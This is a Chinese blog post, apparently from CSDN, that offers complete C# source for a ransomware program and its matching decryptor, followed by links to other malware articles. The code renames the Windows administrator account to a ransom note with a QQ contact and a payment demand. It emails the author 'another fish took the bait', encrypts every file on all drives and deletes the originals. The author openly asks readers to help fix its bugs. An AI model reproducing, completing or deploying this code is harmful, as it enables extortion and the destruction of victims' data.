恶意程序敲诈者解析

最新推荐文章于 2024-10-29 10:15:20 发布
最新推荐文章于 2024-10-29 10:15:20 发布
阅读量642 收藏
点赞数 1
分类专栏: c# 文章标签: c# 开发人员 算法 病毒样本 安全参考代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/a524371025/article/details/47666929
版权

实现c#封装的执行批处理函数
实现批处理修改超级管理员账户名和密码(此处批处理有bug 望批处理大神不吝赐教)
实现了 加密全盘所有文件 密码完全随机绝不重复 需根据随机码才能提取真实密码并解密文件
实现smtp邮件提醒(此处有bug 望写出来的人不吝赐教)

需要用的技术
1 线程池 2 AES加密算法 3 smtp协议 4 I/O流 5 创建Cmd进程

加密解密类 此处摘自

http://blog.youkuaiyun.com/woyaowenzi/article/details/6582275

/// <summary>
    /// 异常处理类
    /// </summary>
    public class CryptoHelpException : ApplicationException
    {
        public CryptoHelpException(string msg) : base(msg) { }
    }

    /// <summary>
    /// CryptHelp
    /// </summary>
    public class DESFileClass
    {
        private const ulong FC_TAG = 0xFC010203040506CF;

        private const int BUFFER_SIZE = 128 * 1024;

        /// <summary>
        /// 检验两个Byte数组是否相同
        /// </summary>
        /// <param name="b1">Byte数组</param>
        /// <param name="b2">Byte数组</param>
        /// <returns>true-相等</returns>
        private static bool CheckByteArrays(byte[] b1, byte[] b2)
        {
            if (b1.Length == b2.Length)
            {
                for (int i = 0; i < b1.Length; ++i)
                {
                    if (b1[i] != b2[i])
                        return false;
                }
                return true;
            }
            return false;
        }

        /// <summary>
        /// 创建DebugLZQ ,http://www.cnblogs.com/DebugLZQ
        /// </summary>
        /// <param name="password">密码</param>
        /// <param name="salt"></param>
        /// <returns>加密对象</returns>
        private static SymmetricAlgorithm CreateRijndael(string password, byte[] salt)
        {
            PasswordDeriveBytes pdb = new PasswordDeriveBytes(password, salt, "SHA256", 1000);

            SymmetricAlgorithm sma = Rijndael.Create();
            sma.KeySize = 256;
            sma.Key = pdb.GetBytes(32);
            sma.Padding = PaddingMode.PKCS7;
            return sma;
        }

        /// <summary>
        /// 加密文件随机数生成
        /// </summary>
        private static RandomNumberGenerator rand = new RNGCryptoServiceProvider();

        /// <summary>
        /// 生成指定长度的随机Byte数组
        /// </summary>
        /// <param name="count">Byte数组长度</param>
        /// <returns>随机Byte数组</returns>
        private static byte[] GenerateRandomBytes(int count)
        {
            byte[] bytes = new byte[count];
            rand.GetBytes(bytes);
            return bytes;
        }

        /// <summary>
        /// 加密文件
        /// </summary>
        /// <param name="inFile">待加密文件</param>
        /// <param name="outFile">加密后输入文件</param>
        /// <param name="password">加密密码</param>
        public static void EncryptFile(string inFile, string outFile, string password)
        {
            using (FileStream fin = File.OpenRead(inFile),
                fout = File.OpenWrite(outFile))
            {
                long lSize = fin.Length; // 输入文件长度
                int size = (int)lSize;
                byte[] bytes = new byte[BUFFER_SIZE]; // 缓存
                int read = -1; // 输入文件读取数量
                int value = 0;

                // 获取IV和salt
                byte[] IV = GenerateRandomBytes(16);
                byte[] salt = GenerateRandomBytes(16);

                // 创建加密对象
                SymmetricAlgorithm sma = DESFileClass.CreateRijndael(password, salt);
                sma.IV = IV;

                // 在输出文件开始部分写入IV和salt
                fout.Write(IV, 0, IV.Length);
                fout.Write(salt, 0, salt.Length);

                // 创建散列加密
                HashAlgorithm hasher = SHA256.Create();
                using (CryptoStream cout = new CryptoStream(fout, sma.CreateEncryptor(), CryptoStreamMode.Write),
                    chash = new CryptoStream(Stream.Null, hasher, CryptoStreamMode.Write))
                {
                    BinaryWriter bw = new BinaryWriter(cout);
                    bw.Write(lSize);

                    bw.Write(FC_TAG);

                    // 读写字节块到加密流缓冲区
                    while ((read = fin.Read(bytes, 0, bytes.Length)) != 0)
                    {
                        cout.Write(bytes, 0, read);
                        chash.Write(bytes, 0, read);
                        value += read;
                    }
                    // 关闭加密流
                    chash.Flush();
                    chash.Close();

                    // 读取散列
                    byte[] hash = hasher.Hash;

                    // 输入文件写入散列
                    cout.Write(hash, 0, hash.Length);

                    // 关闭文件流
                    cout.Flush();
                    cout.Close();
                }
            }
        }

        /// <summary>
        /// 解密文件
        /// </summary>
        /// <param name="inFile">待解密文件</param>
        /// <param name="outFile">解密后输出文件</param>
        /// <param name="password">解密密码</param>
        public static void DecryptFile(string inFile, string outFile, string password)
        {
            // 创建打开文件流
            using (FileStream fin = File.OpenRead(inFile),
                fout = File.OpenWrite(outFile))
            {
                int size = (int)fin.Length;
                byte[] bytes = new byte[BUFFER_SIZE];
                int read = -1;
                int value = 0;
                int outValue = 0;

                byte[] IV = new byte[16];
                fin.Read(IV, 0, 16);
                byte[] salt = new byte[16];
                fin.Read(salt, 0, 16);

                SymmetricAlgorithm sma = DESFileClass.CreateRijndael(password, salt);
                sma.IV = IV;

                value = 32;
                long lSize = -1;

                // 创建散列对象, 校验文件
                HashAlgorithm hasher = SHA256.Create();

                using (CryptoStream cin = new CryptoStream(fin, sma.CreateDecryptor(), CryptoStreamMode.Read),
                    chash = new CryptoStream(Stream.Null, hasher, CryptoStreamMode.Write))
                {
                    // 读取文件长度
                    BinaryReader br = new BinaryReader(cin);
                    lSize = br.ReadInt64();
                    ulong tag = br.ReadUInt64();

                    if (FC_TAG != tag)
                        throw new CryptoHelpException("文件被破坏");

                    long numReads = lSize / BUFFER_SIZE;

                    long slack = (long)lSize % BUFFER_SIZE;

                    for (int i = 0; i < numReads; ++i)
                    {
                        read = cin.Read(bytes, 0, bytes.Length);
                        fout.Write(bytes, 0, read);
                        chash.Write(bytes, 0, read);
                        value += read;
                        outValue += read;
                    }

                    if (slack > 0)
                    {
                        read = cin.Read(bytes, 0, (int)slack);
                        fout.Write(bytes, 0, read);
                        chash.Write(bytes, 0, read);
                        value += read;
                        outValue += read;
                    }

                    chash.Flush();
                    chash.Close();

                    fout.Flush();
                    fout.Close();

                    byte[] curHash = hasher.Hash;

                    // 获取比较和旧的散列对象
                    byte[] oldHash = new byte[hasher.HashSize / 8];
                    read = cin.Read(oldHash, 0, oldHash.Length);
                    if ((oldHash.Length != read) || (!CheckByteArrays(oldHash, curHash)))
                        throw new CryptoHelpException("文件被破坏");
                }

                if (outValue != lSize)
                    throw new CryptoHelpException("文件大小不匹配");
            }
        }
    }

加密程序

namespace 委托人
{
    /// <summary>
    /// 解密程序在同一个解决方案下
    /// </summary>
    public partial class Form1 : Form
    {
        private string pwd = "";
        private string key = "111111111111111111111111111111111111111111111111111111111111111111111111111111111111111";
        private DriveInfo[] drives;
        private string username;
        private string Randomcode = "";
        //AES默认密钥向量   
        public static readonly byte[] AES_IV = { 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF, 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF };
        public Form1()
        {
            InitializeComponent();
            //获取磁盘所有驱动
            drives = DriveInfo.GetDrives();
            //获取当前登录账户名
            username = Environment.UserName;
            //生成密码
            pwd = DateTime.Now.ToString();
            //生成随机码
            Randomcode = EncryptByAES(pwd, key);
            //批处理 此处批处理有bug 需自行修改
            StringBuilder sb = new StringBuilder();
            sb.Append("set /p user=" + username);
            sb.Append(" set /p newuser=想破密码加Q1712385429解密文件需另外付钱解密随机码" + Randomcode);
            sb.Append(" wmic useraccount where name='%user%' call Rename %newuser%");
            sb.Append(" net user 想破密码加Q1712385429解密文件需另外付钱解密随机码" + Randomcode + "123");
            //执行批处理
            Cmd(new string[] { sb.ToString() });
            label1.Text = "想破密码加Q1712385429解密文件需另外付钱解密随机码" + Randomcode;
            SendSmtp();//发送邮件提醒
            Traversedrive();//此处千万慎重执行 未经测试不敢保证加密文件一定能全部正确解密
        }
        /// <summary>
        /// 运行CMD命令
        /// </summary>
        /// <param name="cmd">命令</param>
        /// <returns></returns>
        public static string Cmd(string[] cmd)
        {
            Process p = new Process();
            p.StartInfo.FileName = "cmd.exe";
            p.StartInfo.UseShellExecute = false;
            p.StartInfo.RedirectStandardInput = true;
            p.StartInfo.RedirectStandardOutput = true;
            p.StartInfo.RedirectStandardError = true;
            p.StartInfo.CreateNoWindow = true;
            p.Start();
            p.StandardInput.AutoFlush = true;
            for (int i = 0; i < cmd.Length; i++)
            {
                p.StandardInput.WriteLine(cmd[i].ToString());
            }
            p.StandardInput.WriteLine("exit");
            string strRst = p.StandardOutput.ReadToEnd();
            p.WaitForExit(300);
            p.Close();
            return strRst;
        }

        /// <summary>
        /// 遍历驱动
        /// </summary>
        private void Traversedrive()
        {
            //设置最大辅助线程为500异步I/O线程500
            ThreadPool.SetMaxThreads(500, 500);
            //遍历磁盘所有驱动
            foreach (DriveInfo c in drives)
            {
                DirectoryInfo Root = c.RootDirectory;
                //开启一条新线程遍历文件夹
                ThreadPool.QueueUserWorkItem(new WaitCallback(Traversefolder), Root);  
            }
        }

        /// <summary>
        /// 遍历硬盘所有文件并加密
        /// </summary>
        /// <param name="obj"></param>
        private void Traversefolder(Object obj)
        {
            DirectoryInfo Root = (DirectoryInfo)obj;
            //强类型获取所有文件和文件夹
            FileSystemInfo[] SysInfo = Root.GetFileSystemInfos();
            foreach (FileSystemInfo sys in SysInfo)
            {
                //是否是文件夹
                if (sys is DirectoryInfo)
                {
                    DirectoryInfo Dirinfo = sys as DirectoryInfo;
                    //开启一条新线程遍历文件夹
                    ThreadPool.QueueUserWorkItem(new WaitCallback(Traversefolder), Dirinfo);
                    return;
                }
                string outFile = "";
                //如果是文件
                if (sys is FileInfo)
                {
                    try
                    {
                        //得到加密后文件输出路径
                        outFile = sys.FullName + ".dat";
                        //加密
                        DESFileClass.EncryptFile(sys.FullName, outFile, pwd);
                        //删除源文件
                        sys.Delete();
                    }
                    catch
                    {
                        //此处代表权限不够 删除加密后文件
                        if (File.Exists(outFile))
                        {
                            File.Delete(outFile);
                        }
                    }
                }
            }
        }

        /// <summary>  
        /// AES加密算法  
        /// </summary>  
        /// <param name="input">明文字符串</param>  
        /// <param name="key">密钥</param>  
        /// <returns>字符串</returns>  
        public static string EncryptByAES(string input, string key)
        {
            byte[] keyBytes = Encoding.UTF8.GetBytes(key.Substring(0, 32));
            using (AesCryptoServiceProvider aesAlg = new AesCryptoServiceProvider())
            {
                aesAlg.Key = keyBytes;
                aesAlg.IV = AES_IV;

                ICryptoTransform encryptor = aesAlg.CreateEncryptor(aesAlg.Key, aesAlg.IV);
                using (MemoryStream msEncrypt = new MemoryStream())
                {
                    using (CryptoStream csEncrypt = new CryptoStream(msEncrypt, encryptor, CryptoStreamMode.Write))
                    {
                        using (StreamWriter swEncrypt = new StreamWriter(csEncrypt))
                        {
                            swEncrypt.Write(input);
                        }
                        byte[] bytes = msEncrypt.ToArray();
                        //return Convert.ToBase64String(bytes);//此方法不可用
                        return BitConverter.ToString(bytes);
                    }
                }
            }
        }
        
        /// <summary>
        /// 邮件发送函数 有bug 望擅长此道的人不吝赐教 自行修改
        /// </summary>
        private void SendSmtp()
        {
            //简单邮件传输协议类
            System.Net.Mail.SmtpClient client = new System.Net.Mail.SmtpClient();
            client.Host = "smtp.qq.com";//邮件服务器
            client.Port = 25;//smtp主机上的端口号,默认是25.
            client.DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.Network;//邮件发送方式:通过网络发送到SMTP服务器
            client.Credentials = new System.Net.NetworkCredential("panthervic@163.com","pwd");//凭证,发件人登录邮箱的用户名和密码

            //电子邮件信息类
            System.Net.Mail.MailAddress fromAddress = new System.Net.Mail.MailAddress("panthervic@163.com", "寻寻觅觅");//发件人Email,在邮箱是这样显示的,[发件人:小明<panthervic@163.com>;]
            System.Net.Mail.MailAddress toAddress = new System.Net.Mail.MailAddress("43327681@163.com", "随风去旅行");//收件人Email,在邮箱是这样显示的, [收件人:小红<43327681@163.com>;]
            System.Net.Mail.MailMessage mailMessage = new System.Net.Mail.MailMessage(fromAddress, toAddress);//创建一个电子邮件类
            mailMessage.Subject = "邮件的主题";
            //string filePath = Server.MapPath("/index.html");//邮件的内容可以是一个html文本.
            //System.IO.StreamReader read = new System.IO.StreamReader(filePath, System.Text.Encoding.GetEncoding("GB2312"));
            //string mailBody = read.ReadToEnd();
            string mailBody = "又有一条鱼上钩了 准备!!!";
            //read.Close();
            mailMessage.Body = mailBody;//可为html格式文本
            //mailMessage.Body = "邮件的内容";//可为html格式文本
            mailMessage.SubjectEncoding = System.Text.Encoding.UTF8;//邮件主题编码
            mailMessage.BodyEncoding = System.Text.Encoding.GetEncoding("GB2312");//邮件内容编码
            mailMessage.IsBodyHtml = true;//邮件内容是否为html格式
            mailMessage.Priority = System.Net.Mail.MailPriority.High;//邮件的优先级,有三个值:高(在邮件主题前有一个红色感叹号,表示紧急),低(在邮件主题前有一个蓝色向下箭头,表示缓慢),正常(无显示).
            try
            {
                client.Send(mailMessage);//发送邮件
                MessageBox.Show("发送成功");
                //client.SendAsync(mailMessage, "ojb");异步方法发送邮件,不会阻塞线程.
            }
            catch (Exception ex)
            {
                MessageBox.Show("发送失败:" + ex.Message);
            }
        }
    }
}


解密程序

namespace 解密
{
    /// <summary>
    /// 解密
    /// </summary>
    public partial class Form1 : Form
    {
        //AES默认密钥向量   
        public static readonly byte[] AES_IV = { 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF, 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF };
        private const ulong FC_TAG = 0xFC010203040506CF;
        private const int BUFFER_SIZE = 128 * 1024;
        private string pwd = "";
        private string key = "111111111111111111111111111111111111111111111111111111111111111111111111111111111111111";
        private DriveInfo[] drives;
        public Form1()
        {
            InitializeComponent();            
        }

        private void btnDecrypt_Click(object sender, EventArgs e)
        {
            //AES解密提取密码
            pwd = DecryptByAES(textBox1.Text, key);
            //遍历所有磁盘解密
            Traversedrive();
        }

        /// <summary>  
        /// AES解密  
        /// </summary>  
        /// <param name="input">密文字节数组</param>  
        /// <param name="key">密钥</param>  
        /// <returns>返回解密后的字符串</returns>  
        public static string DecryptByAES(string input, string key)
        {
            //byte[] inputBytes = Convert.FromBase64String(input); //Encoding.UTF8.GetBytes(input);
            string[] sInput = input.Split("-".ToCharArray());
            byte[] inputBytes = new byte[sInput.Length];
            for (int i = 0; i < sInput.Length; i++)
            {
                inputBytes[i] = byte.Parse(sInput[i], NumberStyles.HexNumber);
            }
            byte[] keyBytes = Encoding.UTF8.GetBytes(key.Substring(0, 32));
            using (AesCryptoServiceProvider aesAlg = new AesCryptoServiceProvider())
            {
                aesAlg.Key = keyBytes;
                aesAlg.IV = AES_IV;

                ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);
                using (MemoryStream msEncrypt = new MemoryStream(inputBytes))
                {
                    using (CryptoStream csEncrypt = new CryptoStream(msEncrypt, decryptor, CryptoStreamMode.Read))
                    {
                        using (StreamReader srEncrypt = new StreamReader(csEncrypt))
                        {
                            return srEncrypt.ReadToEnd();
                        }
                    }
                }
            }
        }

        /// <summary>
        /// 遍历驱动
        /// </summary>
        private void Traversedrive()
        {
            //设置最大辅助线程为500异步I/O线程500
            ThreadPool.SetMaxThreads(500, 500);
            foreach (DriveInfo c in drives)
            {
                DirectoryInfo Root = c.RootDirectory;
                ThreadPool.QueueUserWorkItem(new WaitCallback(Traversefolder), Root);
            }
        }

        /// <summary>
        /// 遍历硬盘所有文件并解密
        /// </summary>
        /// <param name="obj"></param>
        private void Traversefolder(Object obj)
        {
            DirectoryInfo Root = (DirectoryInfo)obj;
            FileSystemInfo[] SysInfo = Root.GetFileSystemInfos();
            foreach (FileSystemInfo sys in SysInfo)
            {
                if (sys is DirectoryInfo)
                {
                    DirectoryInfo Dirinfo = sys as DirectoryInfo;
                    ThreadPool.QueueUserWorkItem(new WaitCallback(Traversefolder), Dirinfo);
                    return;
                }
                if (sys is FileInfo)
                {
                    try
                    {
                        string outFile = sys.FullName.Substring(0, sys.FullName.Length - 4);
                        if (sys.FullName.EndsWith(".dat"))
                        {
                            DecryptFile(sys.FullName, outFile, pwd);
                            sys.Delete();
                        }
                    }
                    catch(Exception ex)//捕获异常并输出
                    {
                        MessageBox.Show("随机码错误!!!"+ex.Message);
                    }
                }
            }
        }

        /// <summary>
        /// 检验两个Byte数组是否相同
        /// </summary>
        /// <param name="b1">Byte数组</param>
        /// <param name="b2">Byte数组</param>
        /// <returns>true-相等</returns>
        private static bool CheckByteArrays(byte[] b1, byte[] b2)
        {
            if (b1.Length == b2.Length)
            {
                for (int i = 0; i < b1.Length; ++i)
                {
                    if (b1[i] != b2[i])
                        return false;
                }
                return true;
            }
            return false;
        }

        /// <summary>
        /// 创建DebugLZQ ,http://www.cnblogs.com/DebugLZQ
        /// </summary>
        /// <param name="password">密码</param>
        /// <param name="salt"></param>
        /// <returns>加密对象</returns>
        private static SymmetricAlgorithm CreateRijndael(string password, byte[] salt)
        {
            PasswordDeriveBytes pdb = new PasswordDeriveBytes(password, salt, "SHA256", 1000);

            SymmetricAlgorithm sma = Rijndael.Create();
            sma.KeySize = 256;
            sma.Key = pdb.GetBytes(32);
            sma.Padding = PaddingMode.PKCS7;
            return sma;
        }

        /// <summary>
        /// 解密文件
        /// </summary>
        /// <param name="inFile">待解密文件</param>
        /// <param name="outFile">解密后输出文件</param>
        /// <param name="password">解密密码</param>
        public static void DecryptFile(string inFile, string outFile, string password)
        {
            // 创建打开文件流
            using (FileStream fin = File.OpenRead(inFile),
                fout = File.OpenWrite(outFile))
            {
                int size = (int)fin.Length;
                byte[] bytes = new byte[BUFFER_SIZE];
                int read = -1;
                int value = 0;
                int outValue = 0;

                byte[] IV = new byte[16];
                fin.Read(IV, 0, 16);
                byte[] salt = new byte[16];
                fin.Read(salt, 0, 16);

                SymmetricAlgorithm sma = CreateRijndael(password, salt);
                sma.IV = IV;

                value = 32;
                long lSize = -1;

                // 创建散列对象, 校验文件
                HashAlgorithm hasher = SHA256.Create();

                using (CryptoStream cin = new CryptoStream(fin, sma.CreateDecryptor(), CryptoStreamMode.Read),
                    chash = new CryptoStream(Stream.Null, hasher, CryptoStreamMode.Write))
                {
                    // 读取文件长度
                    BinaryReader br = new BinaryReader(cin);
                    lSize = br.ReadInt64();
                    ulong tag = br.ReadUInt64();

                    if (FC_TAG != tag)
                        throw new CryptoHelpException("文件被破坏");

                    long numReads = lSize / BUFFER_SIZE;

                    long slack = (long)lSize % BUFFER_SIZE;

                    for (int i = 0; i < numReads; ++i)
                    {
                        read = cin.Read(bytes, 0, bytes.Length);
                        fout.Write(bytes, 0, read);
                        chash.Write(bytes, 0, read);
                        value += read;
                        outValue += read;
                    }

                    if (slack > 0)
                    {
                        read = cin.Read(bytes, 0, (int)slack);
                        fout.Write(bytes, 0, read);
                        chash.Write(bytes, 0, read);
                        value += read;
                        outValue += read;
                    }

                    chash.Flush();
                    chash.Close();

                    fout.Flush();
                    fout.Close();

                    byte[] curHash = hasher.Hash;

                    // 获取比较和旧的散列对象
                    byte[] oldHash = new byte[hasher.HashSize / 8];
                    read = cin.Read(oldHash, 0, oldHash.Length);
                    if ((oldHash.Length != read) || (!CheckByteArrays(oldHash, curHash)))
                        throw new CryptoHelpException("文件被破坏");
                }

                if (outValue != lSize)
                    throw new CryptoHelpException("文件大小不匹配");
            }
        }

        /// <summary>
        /// 异常处理类
        /// </summary>
        public class CryptoHelpException : ApplicationException
        {
            public CryptoHelpException(string msg) : base(msg) { }
        }
    }
}

AES加密解密算法摘自http://www.cnblogs.com/yank/p/3528548.html 

欢迎有兴趣的朋友一起讨论 如有突破还望不吝赐教 转载请注明出处谢谢合作

[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 9066
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
[系统安全] 二十七.WannaCry勒索病毒分析 (3)蠕虫传播机制解析及IDA和OD逆向
杨秀璋的专栏
03-06 6727
前文分享了MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒,复现了WannaCry勒索病毒。这篇文章作者将继续分析WannaCry勒索病毒,主要通过IDA和OD逆向分析蠕虫传播部分,详细讲解蠕虫是如何感染传播的。同时,由于作者技术真的菜,只能叙述自己摸索的过程,如果存在错误或不足之处,还望告知。希望这篇基础性文章对您有所帮助~
分析恶意Windows程序
Hvnt3r的博客
03-24 1017
知识点 多数恶意代码运行在Windows上,因此对Windows变成概念的深刻理解会帮助我们识别出恶意代码在主机上感染的迹象,本章会介绍一些恶意代码使用Windows功能的独特方式,并且会讨论恶意代码是如何使用内核模式来实现额外功能与自身隐藏的。 **Windows API:**Windows API是一个广泛的功能集合,管理着恶意代码与微软程序库之间的交互方式,Windows API使用他自己...
恶意软件
kexinxin1的博客
12-20 733
恶意软件 我们所关心的威胁是针对应用程序、实用程序(utility program,如编辑器,编译器)以及内核级(kernel-level)程序的威胁 恶意软件的类型 名称 描述 病毒 当其执行时,设法将自己复制到其他可执行代码中的恶意软件。如果复制成功,就称这个可执行代码被感染了。当被感染的可执行代码运行时,病毒即被执行 ...
病毒恶意程序
weixin_33670786的博客
07-22 405
仅仅在几年前,我们还可以清晰地辩明哪些软件是具有恶意的而哪些软件是无害的,然而在今天,病毒无论在种类还是数量上都呈现出爆炸性的增长,甚至有大量的非授权软件已经超过了病毒的意义范畴,恶意程序已经形成了一个大的族群。早期危害计算机的恶意程序主要是计算机病毒,但是随着网络基础设施和软件应用的不断发展,恶意程序的形态也在不断变化。之前的几年时间里,网络蠕虫成为了对网络用户的最主要威胁,快速的传播能力和摧毁...
恶意程序
family_love_1998的博客
04-14 185
*****谨慎使用***** package www.bit.java; import java.io.File; public class IO { public static void main(String[] args) { File file = new File("C:"); System.out.println("遍历开始....
恶意软件及其类型(病毒、蠕虫、木马、间谍软件、勒索软件、恐吓软件、Bots和Rootkits等)的介绍
四个菜
02-12 1万+
恶意软件指有目的地实现攻击者有害意图的软件程序[1]。 这些恶意的意图包括:扰乱系统的正常工作、试图获取计算机系统和网络的资源以及在未获得用户的许可时得到其私人的敏感信息等。因此,恶意软件对主机的安全性、网络的安全性和隐私的安全性都带来了巨大的威胁[2]。 恶意软件能够以多种方式和渠道入侵系统,大致有: (1)利用网络的漏洞,对可攻击的系统实施自动感染; (2)利用浏览器的漏洞,其通过网络被用户下...
基于签名的恶意软件检测技术原理解析
恶意软件(Malware)是一种具有恶意目的并对计算机系统、网络安全产生威胁的软件程序。在网络安全领域,恶意软件是一个严重的问题,给个人用户、企业机构甚至国家安全造成了巨大的损失。 随着计算机和互联网的普及...
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
热门推荐
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
[系统安全] 十七.Windows PE病毒概念、分类及感染方式详解
杨秀璋的专栏
02-01 1万+
作者前文介绍了PE文件格式,熟悉各种PE编辑查看工具,针对目标EXE程序新增对话框等;这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这些基础性知识不仅和系统安全相关,同样与我们身边的APP、常用软件及操作系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,安全保障任重道远。本文参考了《软件安全》视频、安全网站和参考文献中的文章,并结合自己的经验和实践进行撰写,也推荐大家阅读参考文献。
11恶意程序
Pang
03-24 1185
恶意程序概述 恶意程序是在未授权的情况下,以破坏软硬件设备,窃取用户信息,扰乱用户心理,干扰用户正常使用为目的而编制的软件或代码片段 恶意程序分类 计算机病毒 螨虫 特洛伊木马 隐遁工具 间谍软件 恶意广告 流氓软件 逻辑炸弹 恶意程序特征 强制安装,难以卸载 浏览器劫持:擅自修改用户浏览器设置,迫使用户访问特定网站或导致用户无法正常上网 病毒...
恶意软件与程序
2302_76241188的博客
02-24 1156
恶意软件(Malicious Software,简称 Malware)是指故意编写的旨在损害计算机系统或其用户的任何软件代码或计算机程序。几乎所有现代网络攻击都涉及某种类型的恶意软件。这些恶意程序可以采取多种形式,包括采用具有高度破坏性和成本高昂的勒索软件以及仅采用令人讨厌的广告软件,具体取决于网络罪犯的目的。网络罪犯开发和使用恶意软件来:劫持设备、数据或整个企业网络以获取巨额赎金未经授权访问敏感数据或数字资产窃取登录凭证、信用卡卡号、知识产权或其他有价值的信息扰乱企业和政府机构所依赖的关键系统。
恶意程序- 安全建议
本博客,博文仅代表个人操作经验,不能完全解决你的问题,仅供参考,佛系回复。
08-06 408
一、对于个人用戶: 1.电脑应当安装具有高级威胁防护能力和主动防御功能的安全软件,不随意退出安 全软件或关闭防护功能,对安全软件提示的各类⻛险行为不要轻易采取放行操 作。 2.可使用安全软件的漏洞修复功能,第一时间为操作系统、浏览器和常用软件打好 补丁,以免病毒利用漏洞入侵电脑。 3.尽量使用安全浏览器,减少遭遇挂⻢攻击、钓⻥网站的⻛险。 4.重要文档、数据应经常做备份,一旦文件损坏或丢失,也可以及时找回。 5.电脑设置的口令要足够复杂,包括数字、大小写字母、符号且⻓度至少应该有8 位,不使用弱口令,以防攻
恶意程序分类
Starr
06-24 3169
文章目录后门或陷门逻辑炸弹特洛伊木马Zombie(肉机)病 毒分类蠕 虫防病毒软件 graph TD a[malicious programs]-->b[needs host program] a-->c[independent] b-->d[trapdoors] b-->e[logicbombs] b-->f[Tr...
恶意软件分析实战02-分析3个恶意程序
輚至消亡
07-15 1623
1. Lab03-01 vt上一搜发现鉴别为恶意软件。 拖到PEID内一查,加了一个壳PEncrypt 3.1 Final -> jnukcode。 我好气,脱了我一个多小时没脱下来。想想算了,题目要求也就是分析它的行为。 打开Promon检测一下。发现了大量注册表和文件操作: 对比下注册表的变化, 发现了该软件有添加自启动行为 查询一下内部的字符串, 果然如此: 其内部还发现了一个网站。推测这个名为vmx32to64.exe的程序可能从该网站下载下来或者是自身改...
渗透测试入门实战,渗透测试零基础入门到精通,收藏这篇就够了
最新发布
Javachichi的博客
10-29 1035
渗透测试,又称 “ 白帽黑客 ” 测试,是出于增强安全性的目的,在得到授权的前提下,通过利用与恶意攻击者相同的思路、技术、策略和手段,对给定组织机构的安全问题进行检测和评估的过程。通过渗透测试,能够由 “ 知彼“ 做到 “知己” ,发现使用传统检测方法无法发现的攻击路径、攻击方法和技术弱点,从而在安全问题被攻击者利用之前,对其未雨绸缪地进行修复。无论您如何看待移动设备,移动设备都不会就此停下发展的脚步,而是不断推出新的形式、功能、外形,并且已成为我们日常生活中的一部分。在该章中,将自己视为一名毕业生。
软件安全复习(恶意代码部分)
kjnsdg的博客
01-15 3721
软件安全复习(恶意代码部分)
一个恶意程序
Matrix_Designer的专栏
09-21 932
本人最近学习网络安全,突发灵感,写了兼有病毒、木马、蠕虫于特点的东东。现在贴出来,仅供学习娱乐,勿做他用,否则责任自负。<br /> 编译环境:vc++32位应用程序。源文件有system.h、init.cpp、system.cpp三个。先分别给出代码。<br /> //system.h,系统总体规划<br /> #if !defined(_IHATEBUGGING)<br /> #define _IHATEBUGGING<br /> #include <io.h><br /> #inc
记第一次用C#写Windows窗口应用,就一不小心写出来恶意代码
Vastsa的博客
05-28 368
记第一次用C#写Windows窗口应用,就一不小心写出来恶意代码 Lan 2020-05-28 14:40 153 人阅读 0 条评论 今天终于开始学C#可视化了,C#这方面一直都是跟着进度走,自己也没去自学啥的,所以对一切还是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值